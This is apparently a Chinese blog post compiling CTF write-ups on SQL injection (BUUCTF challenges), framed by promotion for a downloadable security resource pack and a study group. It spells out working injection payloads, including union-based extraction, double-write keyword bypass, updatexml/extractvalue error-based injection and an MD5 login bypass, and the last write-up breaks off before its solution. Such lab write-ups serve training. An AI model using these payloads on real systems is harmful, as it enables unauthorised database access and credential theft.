本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。
最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!下面就开始进入正题,如何从一个萌新一步一步进入网络安全行业。
学习路线图
其中最为瞩目也是最为基础的就是网络安全学习路线图,这里我给大家分享一份打磨了3个月,已经更新到4.0版本的网络安全学习路线图。
相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。
网络安全工具箱
当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份我自己整理的网络安全入门工具以及使用教程和实战。
项目实战
最后就是项目实战,这里带来的是SRC资料&HW资料,毕竟实战是检验真理的唯一标准嘛~
面试题
归根结底,我们的最终目的都是为了就业,所以这份结合了多位朋友的亲身经验打磨的面试题合集你绝对不能错过!
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
爆数据库
1'; show database();#
回显结果
这里猜测注入语句某字段被过滤,或者是’;'被过滤导致不能堆叠注入
爆字段数
1';order by 4#
回显结果
报错
抛弃堆叠注入
步入正题
1' order by 4#
回显结果
成功,但是不存在第4列
同时验证了猜想不能使用堆叠注入
继续判断列数
1' order by 3#
可知列数只有3列
爆数据库
使用联合查询
1' union select 1,2,database()#
爆数据表
1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()#
回显结果
爆出两个表
开始爆数据表的字段
按照先后顺序把,先爆第一个
爆geekuser数据表的字段
1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='geekuser'#
回显结果
字段:id、username、password
爆geekuser数据表的所有内容
1' union select 1,database(),group_concat(id,username,password) from geekuser#
回显结果
无flag
转手数据表l0ve1ysq1
步骤和数据表geekuser一样,这里直接爆数据表l0ve1ysq1的flag值
1' union select 1,database(),group_concat(password) from l0ve1ysq1#
回显结果
得出flag:
flag{3c4b1ff9-6685-4dcb-853e-06093c1e4040}
原文链接:https://blog.csdn.net/m0_73734159/article/details/134185235?spm=1001.2014.3001.5501
双写绕过原理
【例题】[极客大挑战 2019]BabySQL 1
题目环境:
作者已经描述进行了严格的过滤
做好心理准备进行迎接
判断注入类型
admin
1’
字符型注入
万能密码注入
admin
1’ or ‘1’='1
报错
已经是字符型注入了,所以的话只有or这里存在了过滤
联想到buuctf里面还没有碰到双写绕过的题目
所以这里斗胆试一下使用双写绕过
1' oorr '1'='1
成功
使用堆叠注入爆数据库
1';show database();
报错
抛弃堆叠注入
尝试联合注入
联合注入末尾需要使用#号键进行注释#号后面的命令,避免报错
这里值得提一下schema和schemata和常见命令的理解
SCHEMA在MySQL中是数据库,SCHEMATA表用来提供有关数据库的信息。
union select就是联合注入,联合查询的意思
from来自
information_schema是MySQL自带的数据库
group_concat将值连接起来
where来自那个数据库或数据表等等
爆列数(关键命令采用双写进行绕过)
1' oorrder bbyy 4#
1' oorrder bbyy 3#
可知列数只有3列
查位(关键命令采用双写进行绕过)
1' ununionion seselectlect 1,2,3#
爆数据库(关键命令采用双写进行绕过)
1' ununionion seselectlect 1,database(),3#
采用第三列进行注入
爆所有数据库(关键命令采用双写进行绕过)
1' ununionion seselectlect 1,2,group_concat(schema_name) frfromom infoorrmation_schema.schemata#
根据常识ctf数据库里面存在flag的可能更大,故选择ctf数据库
爆ctf数据库里面的数据表
1' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='ctf'#
因为ctf在schema里面所有这里就是table_schema,schema里面的数据库ctf里面的数据表
得到Flag数据表
爆Flag数据表里面的字段
1' ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='Flag'#
得到flag字段
爆flag字段内容
1' ununionion seselectlect 1,2,group_concat(flag) frfromom ctf.Flag#
ctf.Flag意思就是ctf数据库里面的Flag数据表
得到flag:
flag{fbd18420-cab7-4d6e-8fb9-f8ea6febda61}
原文链接:https://blog.csdn.net/m0_73734159/article/details/134277587?spm=1001.2014.3001.5502
报错注入原理
【例题】非常经典的一道SQL报错注入题目[极客大挑战 2019]HardSQL 1(两种解法!)
题目环境:
没错,又是我,这群该死的黑客竟然如此厉害,所以我回去爆肝SQL注入,这次,再也没有人能拿到我的flag了
做了好多这个作者出的题了,看来又要上强度了
判断注入类型
username:admin
password:1
这里把参数password作为注入点
1'
单引号的字符型注入
万能密码注入
1' or '1'='1
万能密码注入被链接
猜测某些字符或者关键字被过滤
SQL注入字典查过滤字符
Intruder字典爆破
光标选中参数password的值1-Add选择爆破目标
选用字典
Start attack开始爆破
OK
爆破结果:
741为过滤内容
可以看到很多字符=、–+、/**/和一些注入命令union、by、‘1’='1等被过滤
继续测试
admin
1’ or
可以看到被拦截了
通过刚才的字典爆破,可以知道1’和or是没有被过滤的
那么真相只有一个,卧槽,空格被过滤了,我直呼好家伙
刚开始本想尝试编码绕过空格,结果不行,这里猜测到了空格限制
空格限制
admin
1’(or)
like没有被过滤,使用like可以绕过=号,like <=> =
重新构造万能密码
1'or((1)like(1))#
可以看到绕过了空格限制
同时也登陆成功了
然后想到了之前做过很类似的一道题
SQL报错注入也用到了空格限制
(已经试了堆叠注入和联合注入都不行)
这里就索性试一下SQL报错注入
知识一、
SQL报错注入常用函数
两个基于XPAT(XML)的报错注入函数
函数updatexml() 是mysql对xml文档数据进行查询和修改的xpath函数
函数extractvalue() 是mysql对xml文档数据进行查询的xpath函数
注入原理:
(在使用语句时,如果XPath_string不符合该种类格式,就会出现格式错误,并且会以系统报错的形式提示出错误!)
(局限性查询字符串长度最大为32位,要突破此限制可使用right(),left(),substr()来截取字符串)其它
函数floor() mysql中用来取整的函数
函数exp() 此函数返回e(自然对数的底)指数X的幂值的函数
首先使用updatexml()函数进行SQL报错注入
爆库
1'or(updatexml(1,concat(0x7e,database(),0x7e),1))#
得到库名geek
查表
1'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))#
得到数据表H4rDsq1
爆字段
1'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))#
得到三个字段:id、username、password
查字段内容
1'or(updatexml(1,concat(0x7e,(select(group_concat(username,'~',password))from(H4rDsq1)),0x7e),1))#
得到前一半flag值flag{389c9161-c2eb-403a-80
使用right()突破字符限制
1'or(updatexml(1,concat(0x7e,(select(group_concat((right(password,25))))from(H4rDsq1)),0x7e),1))#
得到后一段flag值b-403a-8062-80f219ca1c30}
拼接得到最终flag:
flag{389c9161-c2eb-403a-8062-80f219ca1c30}
使用extractvalue()函数进行SQL报错注入
知识:^这个符号可以绕过or的限制
这两种函数大同小异,不再赘述
当然也可以不使用^来绕过or限制,单一的()绕过空格限制也可以
大家可以看下边进行对比学习
1'^extractvalue(1,concat(0x7e,(select(database()))))#
1'or(extractvalue(1,concat(0x7e,(select(database())))))#
好了大家已经明显看到了^和()绕过不同限制的区别
那么下面就给大家一直演示^绕过or限制了(上一个updatexml()函数使用的是()绕过空格限制)
1'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('geek'))))#
1'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))))#
1'^extractvalue(1,concat(0x7e,(select(group_concat(password))from(H4rDsq1))))#
使用right()突破字符限制
1'^extractvalue(1,right(concat(0x7e,(select(group_concat(password))from(H4rDsq1))),30))#
拼接得到最终flag:
flag{389c9161-c2eb-403a-8062-80f219ca1c30}
原文链接:https://blog.csdn.net/m0_73734159/article/details/134450773
md5与SQL之间的碰撞
【例题】BUUCTF [GXYCTF2019]BabySQli 1 详解!
题目环境
burp抓包
随便输入值
repeater放包
在注释那里发现某种编码
MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5
看着像是base编码格式
通过测试发现是套加密(二次加密)
首先使用base32对此编码进行解码
base32解码
c2VsZWN0ICogZnJvbSB1c2VyIHdoZXJlIHVzZXJuYW1lID0gJyRuYW1lJw==
两个等号base64编码无疑了
base64解码
得到一段SQL查询语句
select * from user where username = '$name'
通过对这段SQL语句的初步判断
可以得出此题的注入点是参数name
判断注入类型
1
123
1’
123
发生报错
可以得出此题的注入类型为字符型注入
尝试万能密码
1’ or ‘1’='1
123
猜测’or’关键字或’='字符被过滤
弱口令猜测
首先猜测用户名既有可能是admin
密码暂且还不知道
判断字段数
1’ union select 1,2#
123
1’ union select 1,2,3#
123
可知字段数是3
判断用户所在列
1’ union select ‘admin’,2,3#
123
1’ union select 1,‘admin’,3#
123
通过用户所在列测试,得出了存在用户admin,又得出了admin用户在第二列,也就是username字段那一列。
查看题目源码
在search.php源代码哪里发现关键代码
if($arr[1] == "admin"){
if(md5($password) == $arr[2]){
echo $flag;
}
else{
die("wrong pass!");
}
}
发现参数password被md5加密
看着和之前做过的题很类似
大致就是传进去的值要进行md5值加密
换种方式猜测
username数据表里面的3个字段分别是flag、name、password。
猜测只有password字段位NULL
咱们给参数password传入的值是123
那么传进去后,后台就会把123进行md5值加密并存放到password字段当中
当我们使用查询语句的时候
我们pw参数的值会被md5值进行加密
然后再去与之前存入password中的md5值进行比较
如果相同就会输出flag
爆flag:
这里pw参数的值为123456
可以随便传
但是要对传入的那个值进行md5值加密
网上可以随便找一个在线md5加密平台
1’union select 1,‘admin’,‘e10adc3949ba59abbe56e057f20f883e’#
123456
得出flag:
flag{3c7be44e-df35-40a7-bd91-1b210bf75fcb}
handler命令用法
【例题】BUUCTF [GYCTF2020]Blacklist 1详解
题目环境
判断注入类型
1
1’
可知本题是字符型注入
查库
此题使用堆叠查询
1’;show databases;
查表
1’;show tables;
存在FlagHere数据表
极有可能当中存在flag
查字段数
– - 是闭合符
1’ order by 3 – -
1’ order by 2 – -
可知只有两个字段数
查FlagHere数据表的字段名
1’;show columns from FlagHere;
存在flag字段!
查words数据表的字段名
1’;show columns from words;
从这里看的话这题与buuctf[强网杯 2019]随便注 1这道题是有几分相似的
后者是通过改表名来获取flag值,但是前者既然放到了后边,应该没有那么容易
猜测修改表名的命令极有可能被过滤了
后者题解非常详细可以看看下面这个链接(同时也包含handler解法!)
https://blog.csdn.net/m0_73734159/article/details/134049744
判断命令是否存在过滤
rename
return preg_match(“/set|prepare|alter|rename|select|update|delete|drop|insert|where|./i”,$inject);
果不其然改表名的两个关键命令被过滤了
rename和alter
给大家的福利
零基础入门
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
同时每个成长路线对应的板块都有配套的视频提供:
因篇幅有限,仅展示部分资料
网络安全面试题
绿盟护网行动
还有大家最喜欢的黑客技术
网络安全源码合集+工具包
所有资料共282G,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
3573
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
